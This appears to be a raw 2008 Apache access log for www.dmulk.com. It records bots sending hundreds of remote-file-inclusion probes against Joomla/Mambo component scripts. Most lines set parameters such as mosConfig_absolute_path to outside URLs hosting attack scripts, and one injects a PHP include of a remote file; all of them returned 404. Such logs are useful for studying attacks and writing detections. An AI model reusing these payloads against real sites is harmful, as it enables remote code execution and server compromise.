213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080603.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080603.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080629.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log%20%20//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080603.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080606.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:52 -0700] "GET /logs/access_080530.log//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080603.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//components/minibb/index.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log//components/minibb/index.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080603.log%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log//database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080606.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080603.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:53 -0700] "GET /logs/access_080530.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080606.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080530.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:54 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080606.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080606.log%20%20//components/minibb/index.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080530.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080606.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080530.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080530.log%20%20//components/minibb/index.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080603.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080530.log//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:54 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs//components/minibb/index.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:54 -0700] "GET /logs/access_080606.log//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:54 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
